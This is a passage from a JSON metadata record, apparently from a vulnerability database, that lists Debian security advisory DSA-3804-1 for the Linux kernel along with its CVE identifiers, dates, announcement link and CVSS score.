3804-1] linux security update", "type": "debian", "enchantments": {"score": {"modified": "2018-10-16T22:14:01", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2017-2636", "CVE-2017-6348", "CVE-2017-6214", "CVE-2017-6345", "CVE-2017-5669", "CVE-2017-5986", "CVE-2017-6346", "CVE-2016-9588", "CVE-2017-6353"], "modified": "2017-03-08T17:00:25", "id": "DEBIAN:DSA-3804-1:E7F94", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2017/msg00059.html", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}